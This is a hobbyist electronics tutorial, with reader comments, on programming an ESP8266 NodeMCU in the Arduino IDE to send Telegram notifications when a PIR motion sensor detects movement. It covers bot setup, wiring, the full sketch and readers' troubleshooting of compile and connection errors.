Web Tools Integration ( BIRT WTP Integration 2.3.2 you can download from Eclipse downloads site) Versions of BIRT framework and BIRT WTP integration should be no less than RC4 in order to the BIRT facet works correctly. The plugin. When Eclipse is first started with the JBoss Tools plugins installed, you may be prompted to allow or disallow anonymous statistics to be sent to the JBoss development team. You can find more information on the data that is sent in the Getting Started Guide. Click the to allow the statistics to be sent, or click the button if you prefer not to send this data. The plugin is now installed and ready to use. In this chapter of the guide you will find information on the tasks that you can perform integrating BIRT. The required version of BIRT is 2.3.2 or greater. This section discusses the process of integrating BIRT into a Seam web project. To follow this guide you will need to have the Seam runtime and JBoss Application Server downloaded and extracted on your hard drive. You can download Seam from the Seam Framework web page and JBoss Application Server from JBoss Application Server official site. JBoss Seam 2.2.1 GA and JBoss Application Server 5.1.0 GA were used in the examples presented in this guide. It is recommended that you open the Seam Perspective by selecting→ → → . This perspective provides convenient access to all the Seam tools. To create a new Seam Web project select→ → . If the Seam Perspective is not active, select → → → → . On the first wizard page enter the Project name, specify the Target runtime and Target server. We recommend to use the JBoss AS server and runtime environment to ensure best performance. In the Configuration group select the Seam framework version you are planning to use in your application. In this guide we used Seam 2.2. Click the Birt Reporting Runtime Component facet by checking the appropriate option.button and enable the Alternatively you can select the JBoss BIRT Integration Web Project configuration option from the drop-down list in the Configuration group. You may leave the next two pages with default values; just click thebutton to proceed. On the Birt Configuration page you can modify the BIRT deployment settings. These settings can also be edited afterwards in the web.xml file included in the generated project. Keep the default values for now. You can also leave the default options on the JSF Capabilities page. On the Seam Facet page you should specify the Seam runtime and Connection profile. Please note that the Seam runtime must be the same version you initially specified in the project settings (See Figure 3.1, “Creating Seam Web Project”). When creating a Seam project with BIRT capabilities you can use the BIRT Classic Models Sample Database connection profile to work with the BIRT sample database. For more details on how to configure database connection for a Seam project please read the Configure Seam Facet Settings chapter of Seam Dev Tools Reference Guide. Click thebutton to create the project with BIRT functionality enabled. In the previous section you have created a Seam project with BIRT capabilities. Now you can create a simple kick start project to see that everything is configured correctly. Now create a BIRT report file and insert test data into the file. Name the report file helloBirt.rptdesign in the WebContent folder. The report should print the data from the CLASSICMODELS.CUSTOMERS table of the BIRT Classic Models Sample Database, namely: Customer number ( CLASSICMODELS.CUSTOMERS.CUSTOMERNAME) Contact person first name ( CLASSICMODELS.CUSTOMERS.CONTACTFIRSTNAME) Contact person last name ( CLASSICMODELS.CUSTOMERS.CONTACTLASTNAME) Contact person phone number ( CLASSICMODELS.CUSTOMERS.PHONE) The title of the report should be set via reportTitle parameter. As this guide is primarily focused on the BIRT integration and not the BIRT technology itself, the steps required to make the report will not be shown. For more information on creating a BIRT report file please read the BIRT documentation. When you are done with the helloBirt.rptdesign file, you should create a .xhtml file that will contain the BIRT report you have just created. The JBoss BIRT Integration framework provides 2 components represented as <b:birt> and <b:param> tags. The jboss-seam-birt.jar library implements the functionality of the components. To find more information about the framework pleas read the JBoss BIRT Integraion Framework API Reference chapter. To use that tags on the page you need to declare the tag library and define the name space like this: xmlns:b="" The <b:birt> is a container for a BIRT report, that helps you integrate the report into Seam environment. You can manage the properties of the report using the attributes of the <b:birt> tag. The <b:param> tag describes report parameters. To set a parameter you need to specify it's name the value you want to pass. You can use EL expressions to bind the representation layer with back-end logic. Create the helloBirt.xhtml file in the WebContent folder with the following content: <!DOCTYPE composition PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" ""> <ui:composition <ui:define <rich:panel> <b:birt <b:param </b:birt> </rich:panel> </ui:define> </ui:composition> From this listing above you see that the title of the report is set via <b:param> by setting the parameter name and defining the value attribute with the Customers Contacts value. We have created a Seam project and inserted the helloBirt report into the helloBirt.xhtml view file. To see that the application works correctly and as you expect, you need to launch it on the server. In the Servers view (if it is not open select → → → → ), select the server the application is deployed to and hit the button. When the server is started, open your favorite browser and point it to. The JBoss BIRT Integration feature includes the Hibernate ODA Data Source which is completely integrated with Hibernate Tools. You can use it the way as you would use any of BIRT ODA drivers. First, you need to reverse engineer from the database to generate Seam entities. You can perform this operation going to Seam perspective. More details on the Seam Generate Entities please read Seam Developers Tools Reference guide). In this guide we will use the Employees table of the DATAMODELS database, which can be downloaded from the Getting Started Guide.→ → in the Before performing Seam Generate Entities, you should have a connection profile adjusted and connected to a database. For information on how to do this see the CRUD Database Application chapter of the Seam Developer Tools Reference guide. Next you should create a new BIRT report file (Employees table. Call the file employees.rptdesign, and save it in the WebContent folder. Now switch to the BIRT Report Design perspective. In the Data Explorer view right-click the Data Source node and choose . The wizard will prompt you to select data source type. Choose Hibernate Data Source and give it a meaningful name, for instance HibernateDataSource. Click the button to proceed. On the next wizard's dialog you can leave the everything with default values, click thebutton to verify that the connection is established successfully. The Hibernate Data Source enables you to specify a Hibernate Configuration or JNDI URL. Click the New Data Source wizard.button to complete Now you need to configure a new Hibernate ODA data set. Launch the New Data Set wizard. In the Data Explorer View right-click the Data Set node and select . Select HibernateDataSource as target data source and type in the new data set name. Call it HibernateDataSet. The next dialog of the wizard will help you compose a query for the new data set. We will make a report that will print all employees in the database who has Sales Rep job title. select jobtitle, firstname, lastname, email from Employees as employees where employees.jobtitle = 'Sales Rep' To validate the entered query you can press thebutton. All the HQL features like syntax highlighting, content assist, formatting, drag-and-drop, etc., are available to facilitate query composing. Clicking the Edit Data Set dialog where you can adjust the parameters of the data set and preview the resulted set. If everything looks good, click the button to generate a new data set.button will call the Now you can insert the data set items of HibernateDataSet into the employees.rptdesign file. If you don't know how to do this we suggest that you refer to the Eclipse BIRT Tutorial. You can also use parameters in the query to add dynamics to your report. In the previous example we hard coded the selection criterion in the where clause. To specify the job title on-the-fly your query should look like this: select jobtitle,firstname, lastname,email from Employees as employees where employees.jobtitle = ? The question mark represents a data set input parameter, which is not the same as a report parameter. Now you need to define an new report parameter to pass the data to the report, call it JobTitle. The dataset parameter can be linked to a report parameter. In the Data Explorer view click the Data Set node to open it and right-click on the data set you created previously (in our case it is HibernateDataSet), choose Edit and navigate to the Parameters section. Declare a new data set parameter, name it jobtitle and map it to the already existing JobTitle report parameter. You report is ready, you can view it by clicking on the Preview tab of the BIRT Report Designer editor. You will be prompted to assign a value to the report parameter. For instance you can enter "Sales Rep". Section 3.1, “Adding BIRT Functionality to Standard Seam Web Project” and Section 3.2, “Using Hibernate ODA Data Source” describe how to integrate a BIRT report into a Seam web project and how to use a Hibernate data source to generate a dynamic report. In this section we will create a Seam web project that can make a dynamic report using the parameters that are defined on a web page. We will use the PRODUCTS table of Classic Models Inc. Sample Database for the purpose of this demo project. The demo application will generate a report about the company's products, and allow the user to specify how the report will be sorted. To begin with, we need to generate Seam entities like we did in the previous Section 3.1, “Adding BIRT Functionality to Standard Seam Web Project”. The next step is to create a Java class that will store the sortOrder variable and its assessors. The variable will be required to pass dynamic data to the report via report parameters; therefore it has to be of session scope. The code below shows a simple JavaBean class called ReportJB. import java.io.Serializable; import org.jboss.seam.ScopeType; import org.jboss.seam.annotations.Name; import org.jboss.seam.annotations.Scope; @Name("ReportJB") @Scope(ScopeType.SESSION) public class ReportJB implements Serializable { private static final long serialVersionUID = 1L; protected String sortOrder = "buyprice"; public String getSortOrder() { return sortOrder; } public void setSortOrder(String value) { sortOrder = value; } public ReportJB() { } } The report will print the data from the Products table. Create a new report file file called ProductsReport.rptdesign in the WebContent folder. You can use either the BIRT JDBC Data Source or Hibernate Data Source data source to create the data set for this project. If you want to use the latter please read the previous Section 3.2, “Using Hibernate ODA Data Source”. The data set should have at least the following data set items: product vendor, product name, quantity in stock and buy price. The data is retrieved from the database with this query : SELECT productvendor, productname, quantityinstock, buyprice FROM CLASSICMODELS.PRODUCTS as products Make a table in the report and put each data set item into a column. As it was stated in the beginning of the chapter the report will be dynamic, therefore you need to declare a report parameter first. Call this parameter sortOrder and to add the parameter to the query. BIRT offers rich JavaScript API, so you can modify the query programmatically like this (the xml-property tag shown below should already be present in the report): <xml-property< ![CDATA[ SELECT productvendor, productname, quantityinstock, buyprice FROM CLASSICMODELS.PRODUCTS as products ]]> </xml-property> <method name="beforeOpen"> <![CDATA[ queryString = " ORDER BY products."+reportContext.getParameterValue("sortOrder")+" "+"DESC"; this.queryText = this.queryText+queryString; ]]> </method> The report is ready. You can preview it to make sure it works properly. To set the report parameter you should create an XHTML page, call it ProductForm.xhtml, and place it in the WebContent folder. On the page you can set the value of the sortOrder Java bean variable and click the button to open another view page that will display the resulted report. The source code of the ProductForm.xhtml should be the following: <!DOCTYPE composition PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" ""> <ui:composition <ui:define <rich:panel> <f:facetBIRT Report Generator</f:facet> <a4j:form <table> <tr> <td>Select sort order criterion:</td> <td><h:selectOneMenu <!-- Bind to your Java Bean --> <f:selectItem <f:selectItem </h:selectOneMenu> </td> </tr> </table> </a4j:form> <s:button <!-- If the sertOrder variable is not set the button won't work --> </rich:panel> </ui:define> </ui:composition> The logic of the file is quite simple: when the sort order criterion is selected the value of ReportJB.sortOrder is set automatically via Ajax, and the report is ready to be generated. Now you need to create the web page that will print the report. Name the file ProductsReport.xhtml. The file to output the report should have the following content: <!DOCTYPE composition PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" ""> <ui:composition <ui:define <rich:panel> <f:facetProducts Report</f:facet> <b:birt <b:param </b:birt> </rich:panel> </ui:define> </ui:composition> As you know from Section 3.1, “Adding BIRT Functionality to Standard Seam Web Project”, before using the BIRT Integration framework tags on the page you need to declare the tag library and specify the name space with this line: xmlns:b="" To set the sortOrder report parameter add this line: <b:param We bound the sortOrder report parameter to Java Bean variable value="#{ReportJB.sortOrder}" using EL expression, with the ReportJB.sortOrder variable having its value assigned in the ProductsForm.xhtml file. By default if you embed a report into HTML page the HTML-format report contains the <html>, <head>, <body> etc., tags. However if your HTML page already has those tags, you can rid of them using the embeddable="true" attribute of the <b:birt> component. Deploy the project onto the server and open your browser to see the report is successfully generated. You should navigate to to select the criterion and press the button. You will be redirected to. Thus, a Seam project that includes the BIRT facet can be deployed as any project. If you define the Hibernate ODA driver, the JBoss BIRT engine will use JNDI URL that has to be bound to either Hibernate Session Factory or Hibernate Entity Manager Factory. If you don't specify the JNDI URL property, our engine will try the following JNDI URLs: java:/<project_name> java:/<project_name>EntityManagerFactory When creating a Seam EAR project, Hibernate Entity Manager Factory is bound to java:/{projectName}EntityManagerFactory. All you need to do is to use the Hibernate Configuration created automatically. You can use default values for the Hibernate Configuration and JNDI URL within the BIRT Hibernate Data Source. When using a Seam WAR project, neither HSF nor HEMF are bound to JNDI by default. You have to do this manually. For instance, HSF can be bound to JNDI by adding the following property to the persistence.xml file: <property name="hibernate.session_factory_name" value="java:/projectname"/> And you can use java:/projectname as the JNDI URL property when creating a BIRT Hibernate Data Source. If you want to test this feature using PDE Runtime, you need to add osgi.dev=bin to the WebContent/WEB-INF/platform/configuration/config.ini file. In conclusion, the main goal of this document is to describe the full feature set that JBoss BIRT Tools provide. If you have any questions, comments or suggestions on the topic, please feel free to ask in the JBoss Tools Forum. You can also influence on how you want to see JBoss Tools docs in future leaving your vote on the article Overview of the improvements required by JBossTools/JBDS Docs users. The <b:birt> component servers to integrate a BIRT report into Seam or JSF container. The <b:birt> tag recognizes most of the parameters described on the BIRT Report Viewer Parameters page, though it has attributes of its own. You can find additional JBoss Developer Studio documentation at RedHat documentation website. The latest documentation builds are available through the JBoss Tools Nightly Docs Builds.
http://docs.jboss.org/tools/4.1.0.Final/en/jboss_birt_plugin_ref_guide/html_single/index.html
CC-MAIN-2019-13
refinedweb
3,049
56.86
infocmp(1m) infocmp(1m) infocmp - compare or print out terminfo descriptions infocmp [-1CDEFGIKLTUVcdegilnpqrtux] [-v n] [-s d| i| l| c] [-R subset] [-w width] [-A directory] [-B directory] [termname...] infocmp can be used to compare a binary terminfo entry with other terminfo entries, rewrite a terminfo descrip- tion to take advantage of the use= terminfo field, or print out a terminfo description from the binary file (term) in a variety of formats. In all cases, the boolean fields will be printed first, followed by the numeric fields, followed by the string fields. If no options are specified and zero or one termnames are specified, the -I option will be assumed. If more than one termname is specified, the -d option will be assumed. infocmp compares the terminfo description of the first terminal any- thing essen- tial informa- tion. Manda- tory The -u option produces a terminfo source description of the first terminal termname which is relative to the sum of the descriptions given by the entries for the other terminals termnames. It does this by analyzing the dif- ferences extra use= fields that are superfluous. infocmp will flag any other termname use= fields that were not needed. Changing Databases [-A directory] [-B directory] Like other ncurses utilities, infocmp looks for the termi- nal descriptions in several places. You can use the TER- MINFO and TERMINFO_DIRS environment variables to override the compiled-in default list of places to search (see curses(3x) for details). You can also use the options -A and -B to override the list of places to search when comparing terminal descrip- tions: o The -A option sets the location for the first termname o The -B option sets the location for the other termnames. Using these options, it is possible to compare descrip- tions for a terminal with the same name located in two different databases. For instance, you can use this fea- ture for comparing descriptions for the same terminal cre- ated by different people. . -D tells infocmp to print the database locations that it knows about, and exit. -E Dump the capabilities of the given terminal as tables, needed in the C initializer for a TERMTYPE structure (the terminal capability structure in the <term.h>). This option is useful for preparing ver- sions capabil- ities separate from the TERMTYPE structure. fol- lowing dif- ferences, but resolution can be forced by also speci- fying -r. -f Display complex terminfo strings which contain if/then/else/endif expressions indented for readabil- ity. -G Display constant literals in decimal form rather than their character. incompati- ble with SVr4/XSI. Available terminfo subsets are "SVr1", "Ultrix", "HP", and "AIX"; see terminfo(5) for details. You can also choose the subset "BSD" which selects only capabilities with termcap equiva- lents recognized by 4.4BSD. -s [d|i|l|c] The -s option, respec- tively. infocmp to not post-process the data after parsing the source file. This feature helps when comparing the actual contents extensions to the terminfo repertoire which can be loaded using the -x option of tic. /usr/share/terminfo Compiled terminal description data- base. The -0, m) should be a toe(1m) mode. captoinfo(1m), infotocap(1m), tic(1m), toe(1m), curses(3x), terminfo(5). This describes ncurses version 5.9 (patch 20140816). Eric S. Raymond <esr@snark.thyrsus.com> and Thomas E. Dickey <dickey@invisible-island.net> infocmp(1m)
http://www.invisible-island.net/ncurses/man/infocmp.1m.html
CC-MAIN-2014-42
refinedweb
563
54.63
This tutorial shows how to send notifications to your Telegram account when the ESP826 NodeMCU8266 NodeMCU detects motion. Here’s an overview on how the project works: - You’ll create a Telegram bot for your ESP8266. - The ESP8266 is connected to a PIR motion sensor. - When the sensor detects motion, the ESP8266.8266 them installed in your Arduino IDE. Sketch > Include Library > Manage Libraries. - Install the library. We’re using ArduinoJson library version 6.5.12. Parts Required For this project, you need the following parts: - ESP8266 (read Best ESP8266 development boards) - Mini PIR Motion Sensor (AM312) or PIR motion sensor - Breadboard - Jumper wires Schematic Diagram For this project you need to wire a PIR motion sensor to your ESP8266 board. Follow the next schematic diagram. In this example, we’re wiring the PIR motion sensor data pin to GPIO 14. You can use any other suitable GPIO. Read ESP8266 GPIO Guide. Telegram Motion Detection with Notifications – ESP8266 <ESP8266WiFi.h> #include <WiFiClientSecure.h> #include <UniversalTelegramBot.h> " X509List cert(TELEGRAM_CERTIFICATE_ROOT); WiFiClientSecure client; UniversalTelegramBot bot(BOTtoken, client); const int motionSensor = 14; // PIR Motion Sensor bool motionDetected = false; // Indicates when motion is detected void ICACHE_RAM_ATTR detectsMovement() { //Serial.println("MOTION DETECTED!!!"); motionDetected = true; } void setup() { Serial.begin(115200); configTime(0, 0, "pool.ntp.org"); // get UTC time via NTP client.setTrustAnchors(&cert); // Add root certificate for api.telegram.org // <ESP8266WiFi = 14; //. // Indicates when motion is detected void ICACHE_RAM_ATTR detectsMovement() { //Serial.println("MOTION DETECTED!!!"); } setup() In the setup(), initialize the Serial Monitor. Serial.begin(115200); For the ESP8266, you need to use the following line: client.setInsecure(); In the library examples for the ESP8266 they say: “This is the simplest way of getting this working. If you are passing sensitive information, or controlling something important, please either use certStore or at least client.setFingerPrint“.8266 with PIR Motion Sensor using Interrupts and Timers Init Wi-Fi Initialize Wi-Fi and connect the ESP82668266 board. Don’t forget to go to Tools > Board and select the board you’re using. Go to Tools > Port and select the COM port your board is connected to. After uploading the code, press the ESP8266 on-board8266 NodeMCU board. When motion is detected, a message is sent. With this bot, you can also use your Telegram account to send messages to the ESP82668266 with our resources: Thanks for reading. 69 thoughts on “Telegram: ESP8266 NodeMCU Motion Detection with Notifications (Arduino IDE)” Nice! The code was very good and simple. Good Job! Can this code be adapted to send notifications every fifteen minutes of the thermistor reading connected to an ESP8266 Yes. It’s possible. Regards, Sara Have issues with Esp8266 Node Mcu compilation error . I ca upload a basic file but won’t uploaded this code. Reinstalled the drivers but nothing seems to help Hi. What is exactly the compilation error? Regards, Sara Error compiling for board Node MCU 1.0 ( ESP-12E Module). Can i use Esp8288-01 module for this? Yes, just make sure you use the right GPIO to support interrupts with ESP-01: That is a very awesome code for use Telegram with ESP8266, thank you Sarah and Rui ! I tested it now on an Wemos ESP8266, the serial monitor shows “Motion Detection!!” but i have no message in my Telegram “my_bot” after i put /start in it. The bot code and chat id seems ok. What could be the problem ? How can i troubleshoot this ? Did you add all the details to the ESP8266 code? The Telegram Bot token and your Telegram user ID? Hi Rui, finally a made a new bot , this time on: , and there i could copy paste very easy the bot token. So the fault with me was the previous bot token. For me, there were no mistakes, but there was… Perhaps you could put this info on one of your tutorials ? Hi Sara, Please help to advise how to go to my account to find my idbot. Thanks. You’ll need to search IDbot and it should appear in the users found… I use the Wemos D1 mini for this and works fine, thank you. To use a fix ip-adress i used parts of a different code (who works), but on this code here, it don’t work. It is like the board reboots every time. I added below “const char* password ” these lines: IPAddress staticIP(192, 168, 1, 61); IPAddress gateway(192, 168, 1, 1); IPAddress subnet(255, 255, 255, 0); IPAddress dns1(8, 8, 8, 8); IPAddress dns2(8, 8, 4, 4); below “WiFi.mode(WIFI_STA);” i add this line: WiFi.config(staticIP, gateway, subnet); What is wrong and how do i use a fix ip-adress with this code ? i did everything step by step, i can read Motion dedected on serial monitor but i could not take a message from telegram? my library same as yours version i do not understand why? i could now worked it esp32 cam too, there is a message {“ok”:false,”error_code”:401,”description”:”[Error]: Unauthorized”} Hi. Double-check your botToken. It is a long string, so you may get it wrong somewhere. Regards, Sara Hi Sara, Rui and fans of Randomnerdtutorials, make a new bot on: , and there you can copy and paste in your sketch very easy the bot token and make no mistakes. Hi. That’s right! Thanks for the tip. Regards, Sara Hi, Just wonding if its possible to send a “call” to the telegram app on your phone? Hi. What do you mean? Regards, Sara Well, Instead of sending a text it makes a phone call. PIR has an HT7133 regulator. It needs 5V according to the datasheet. It can not be powered with 3,3V as you pointed in the diagram. I never made it work reliable with a 3,3V power supply. I assume this a mistake. Hi. We use this PIR motion sensor: It woks with 3.3V. Regards, Sara Got a question here about the PIR Sensor , I am using a LHI 878 Sensor, not sure what to apply to pins , ground is ok but the other are S (assuming source) and D for drain. Is source going to D5 andD to 3v? Been getting some odd responses, thanks For the LHI 878 sensor i fount this datasheet: There is a built in mosfet in source follower configuration. So D goes to positive, S should then be the output. It is recommend to use a load resistor of 47Kohms i read at the datasheet. Load is between S and ground. Really good project! Do I understand correctly that another user will not be able to see messages from esp8266 Hi Alex. Yes, that’s correct. Only the user with the CHAT_ID you’ve inserted. REgards, Sara then what if for all users? What do you mean for all users? You can simply remove the condition that checks the sender’s UID. That way, it will listen to anyone who messages the bot. Regards, Sara Sorry for being a pain, tried to load this project on a WeMos D1 R1and receive error compiling board WeMos D1R1 . I loaded a basic program Blink and it loads fine so have to believe it is not a board issue, possibly a compatibility issue, what are your this?Thanks Sara , figured it out, it was an issue with the Arduino json file, had to downgrade to 5.13 and then it worked. So , I have program loaded on Wemos D1 R1, paralled 2 – 100K ohm resistors because i do not have a 47K , 5V from Wemos to D Resistor in series with D5 and G to G on Wemos. Made a new bot and called it driveway, got a new Token, verified it was written properly and used the /start command in bot. What I now have is in chats , /start but no message, in serial window of IDE ……….. across the screen but nothing else . Checked baud rate and it is correct, any suggestions, finally got this far in the project and hate to abandon it now. Hello I’m trying to load the sketch … and I have the following error….. ‘class axTLS::WiFiClientSecure’ has no member named ‘setInsecure’ I don’t know how to fix the error…. Thanks for the help So I have put this aside for some time now and decided to try it again, I get a boat load of error all related to the Arduinojson.h file. I at one time loaded an older version and got it to compile but now that don’t even work. I think I used 5.13 or something similar. Even then it would not see motion or scroll info on the serial monitor. If I crossed the sensor I think I jumped momentarily S and D it would show motion detected but never worked the way it was supposed to. Using LHI 878 with 49K across S – D , Esp8266 lolin typical connections for G 3v and S to D5. Hello and congratulations for your tutorials. I am a beginner in these ESP’s I love electronics and these projects. I tested this code and it worked perfectly in my first ESP8266 NodeMCU 1.0 ESP-12E, instead of the pir sensor I just used a microswitch to put it in the mailbox and receive alerts when the postman inserts a letter. I would like to know if it would be possible in the message (Motion Detected) send the battery reading Volts too? Hi. Yes, you can do that. You need to read the battery voltage using an analog pin. Regards, Sara Dear Sara, How to make the bot to notify if PIR or ESP goes offline? Someone who is making this as part of the simple security system would be interested to be notified about this Thx hi thanks for tutorial it works well my question is how can I add a light that turns on when the pir sensor acts at the same time it sends the message to the telegram (I am a learner) tested and working ….now try to change from pir motion to irsensor why can’t receive messages to telegram?? Hi. Can you better describe your issue? Regards, Sara Hi, I have tested sucessfully on last month. But today, I tested again and It didn’t work. Program not have bug, but Telegram Bot don’t message me. Thank you. Hi. Update the library. Our code is now compatible with the latest version of the library. Regards, Sara HI, just to know, how do i write to change the line (CR). Pex. Alarm ! Motion Detection 12/05/2021 I am having this error exit status 1 Error compiling for board NodeMCU 1.0 (ESP-12E Module). I have tried to downgrade arduino json library but it did not avail. Hi. What’s the line of code highlighted with the error? Or can you give more details about the error? Regards, Sara Hi. I am very interested to know if you already have develop a program for nodemcu, mpu6050 and if the sensor detects a certain angle/acceleration it will notify user through Telegram. The one that I am trying to do is using IFTTT Maker but yours is much more easier to understand. I am very interested to know if it is possible to realize without the use of IFTTT Maker. Thank you very much & have a nice day ahead! Hi. Yes. You try to combine the following tutorials: – – I hope this helps. Regards, Sara Thank you ☺️ Instead of manually asking for the reading through Telegram, is it possible for this method to receive the notification alert automatically? Yes. You can program your board to send a message to telegram every X number of seconds. You can do that in the loop() of your program. Regards, Sara When uploading a program it’s showing a error invalid head of packet can u the sollution Hi. You need to press the ESP32 BOOT button when you start seeing a lot of dots ……… on the debugging window. This article might also help: Regards, Sara Hello Rui and Sara, very good this post as always just get the code and run, it works the first time. My question is if there is any command that checks if it is connected, I caught a case that I couldn’t run the commands after 3 days, restarted and started working again. I verified that you have a post to verify if it is connected to the wi-fi but I wanted something to verify if it is connected to the Telegram. I checked something on google and there is a command, but they use another library ( CTBot) and I found it interesting ” if (myBot.testConnection()) Serial.println(“nConnection Ok!”); else Serial.println(“nConnection failed!”); I don’t know if the UniversalTelegramBot library would have something like that? Hugs Ricardo Hi Sara, Thank you for your excellent work. I don’t know English and I have translated this with Google !!! 🙁 I have implemented this process to a control sketh of the wooden boiler of my house, within a web-serves where I see the operation of it, from the sofa !!!. The sketch you propose works perfectly for me in the ESP 32 WOORD 32s that I am using. When I implement communications with Telegram, an inconsistency occurs between the names of the objects that the libraries generate. Originally both libraries use “client” as the name of the object, and the compiler gives an error …, and I have changed it to this: WiFiClient client; // I establish the WiFi connector WiFiServer server (80); // Set 80 webServer WiFiClientSecure secured_client; UniversalTelegramBot bot (BOTtoken, secured_client); The bot.send function returns a “0” code. bool resulta = bot.sendMessage (CHAT_ID, “Bot started up”, “”); Serial.print (“Result start bot”); Serial.println (result); Alternatives? Sorry but I have not said … And I do not receive any message on Telegram. : – (( Hi. what are exactly the errors that you’re getting? Regards, Sara Hi Sara, Thank you for your interest. I am not an arduino expert …. I enclose the twists of the program that I consider are important for the purpose and the copy of the messages that are displayed on the console. You will see in the function “aviso_telegram” the call to the function ‘bot.sendMessage’ that I have seen returns a ‘bool’ and I show it in the console. Specifically, it returns a ‘0’ without any other type of warning. // Valores para el MySQL #include <MySQL_Connection.h> // COnector con el MySQL #include <MySQL_Cursor.h> // Puntero de insercion de filas en tabla del MySQL IPAddress server_addr(192,168,0,104); // IP of the MySQL server here char user[] = “arduino”; // MySQL user login username char password[] = “xxxx”; // MySQL user login password MySQL_Connection conn((Client *)&client); // Creacion del conector con MySQL // QUIERY que enviamos al MySQL para insertar datos en la BD … // FUNCIONES … int debbuger = 0; void trace(String posicion, int activo){ // debbug por consola if (activo > 0) { if (debbuger > 0){ Serial.println(posicion); } } } void aviso_telegram(int n){ // mensaje a telergram // 1 temperatura en sala < 5 grados, posible congelacion equipos // 2 sin sensores conectados // 3 falta pelets // 4 puesta abierta // trace(“Envio avisos por Telegram”,9); bool resul = bot.sendMessage(CHAT_ID, “Bot started up”, “”); Serial.print(“Resultado start bot “); Serial.print(resul); Serial.print(“Mensaje num. : “); Serial.println(n); switch (n){ case 1: bot.sendMessage(CHAT_ID, “Texto 1”, “”); break; default: bot.sendMessage(CHAT_ID, “No hay texto”, “”); break; } } … WiFi.begin(ssid, clave); #ifdef ESP32 secured_client.setCACert(TELEGRAM_CERTIFICATE_ROOT); // Add root certificate for api.telegram.org #endif while (WiFi.status() != WL_CONNECTED) { delay(500); Serial.print(“.”); …. void loop() { if ((millis() – lastTime) > timerDelay) { // Hemos superado el tiempo de latencia para actualizr la MySQL Serial.println(“Primera llamada a Telegram………………………..”); aviso_telegram(9); Serial.println(“Miro estado WiFi y reconecto en caso necesario”); while (WiFi.status() != WL_CONNECTED) { WiFi.mode(WIFI_STA); WiFi.begin(ssid, clave); delay(500); } …. 18:39:30.802 -> Conectando a la WiFi: TP-Link_A7G4 ….. 18:39:33.280 -> Conexion establecida con la IP : 192.168.0.202 18:39:33.313 -> Conectando con el Servidor MySQL, en la direccion IP : 192.168.0.104 18:39:33.313 -> …trying… 18:39:33.908 -> Connected to server version 8.0.27-0ubuntu0.20.04.1 18:39:34.569 -> Primera llamada a Telegram……………………….. 18:39:42.533 -> Resultado start bot 0 18:39:42.533 -> Opcion mensaje envio Telegram : 9 18:39:50.532 -> Miro estado WiFi y reconecto en caso necesario 18:39:50.532 -> WiFi conectada. 18:39:50.532 -> Estado conexion con MySQL: 1 18:39:52.615 -> INSERT INTO arduino_db.datos_sensores (sen1, sen2, sen3, sen4, sen5, sen6, sen7, sen8, sen9, sen10) VALUES (-127.00, -127.00, 17.44, 23.00, 23.56, 16.00, -127.00, -127.00, 21.78, 45) —–> 184 18:39:53.244 -> Se actualiz la base de datos MySQL cada : 5 minutos. 18:40:01.212 -> Resultado start bot 0 18:40:01.212 -> Opcion mensaje envio Telegram : 4 18:40:09.670 -> Sensores conectados : 4 18:40:13.271 -> Sensores conectados : 4 18:40:16.905 -> Sensores conectados : 4 Hi Sara, Today I have been a bit busy and I could not get on with this until a while ago. The process has been: From the sketch that you propose in this article, I have taken the loop and embedded it in my program (commenting on the rest of the instructions in my loop), the result ….. It does not work !! I have been commenting instruction by instruction of my setup, and testing to see how it responded and I have located the specific instruction that makes it not work. If I comment the instruction: “WiFi.config (local_IP, gateway, subnet, primaryDNS, secondaryDNS);” from my setup and I run, the messages come out correctly .!!! 🙂 🙂 I have it so that the ESP32 has a fixed IP and can access the web with the data from the sensors directly. It would be good if someone tried to repeat this situation, in case it is a problem of updating libraries. The only library that I have been able to see the version is MySQlConnectorArduino V.1.1.1 If someone explains to me how to see the versions of the libraries, I could complete this information. Anyway, thanks for your interest. Hello, and thank you for the nice tutorial. I have a question. If a person sends a message to the BOT, but the arduino is offline, is there any way to send a message “server is offline”? Or since it has to be connected to the Wi-Fi, it won’t be able to send? Hi. Because it is offline, it won’t be able to send. Regards Sara Hello, can i ask something ? Can i use Wifi Shield for this project ? Is there any code that need to changes ? Thank you for very interesting projects. I was wondering if you can incorporate the ESP.deepSleep() function in the code. Hi. Yes. If you use the PIR motion sensor as an external wake up source. Regards, Sara Do I really need to buy the Hardware components for the project to function? Hi. To detect motion you need a motion sensor. If you just want to send messages to telegram, you can omit the sensor section. Regards, Sara Hi Rui and Sara, how can I solve this problem? C:\Users\giasc\Documents\Arduino\libraries\ESP8266WiFi\src\ESP8266WiFiMulti.cpp: In function ‘wl_status_t waitWiFiConnect(uint32_t)’: C:\Users\giasc\Documents\Arduino\libraries\ESP8266WiFi\src\ESP8266WiFiMulti.cpp:89:5: error: ‘esp_delay’ was not declared in this scope 89 | esp_delay(connectTimeoutMs, | ^~~~~~~~~ C:\Users\giasc\Documents\Arduino\libraries\ESP8266WiFi\src\ESP8266WiFiMulti.cpp: In member function ‘int8_t ESP8266WiFiMulti::startScan()’: C:\Users\giasc\Documents\Arduino\libraries\ESP8266WiFi\src\ESP8266WiFiMulti.cpp:241:5: error: ‘esp_delay’ was not declared in this scope 241 | esp_delay(WIFI_SCAN_TIMEOUT_MS, | ^~~~~~~~~ C:\Users\giasc\Documents\Arduino\libraries\ESP8266WiFi\src\ESP8266WiFiSTA-WPS.cpp: In member function ‘bool ESP8266WiFiSTAClass::beginWPSConfig()’: C:\Users\giasc\Documents\Arduino\libraries\ESP8266WiFi\src\ESP8266WiFiSTA-WPS.cpp:77:5: error: ‘esp_suspend’ was not declared in this scope 77 | esp_suspend( { return _wps_config_pending; }); | ^~~~~~~~~~~ C:\Users\giasc\Documents\Arduino\libraries\ESP8266WiFi\src\ESP8266WiFiGeneric.cpp: In member function ‘bool ESP8266WiFiGenericClass::mode(WiFiMode_t)’: C:\Users\giasc\Documents\Arduino\libraries\ESP8266WiFi\src\ESP8266WiFiGeneric.cpp:442:9: error: ‘esp_delay’ was not declared in this scope 442 | esp_delay(timeoutValue, m { return wifi_get_opmode() != m; }, 5); | ^~~~~~~~~ C:\Users\giasc\Documents\Arduino\libraries\ESP8266WiFi\src\ESP8266WiFiGeneric.cpp: In member function ‘int ESP8266WiFiGenericClass::hostByName(const char*, IPAddress&, uint32_t)’: C:\Users\giasc\Documents\Arduino\libraries\ESP8266WiFi\src\ESP8266WiFiGeneric.cpp:626:9: error: ‘esp_delay’ was not declared in this scope 626 | 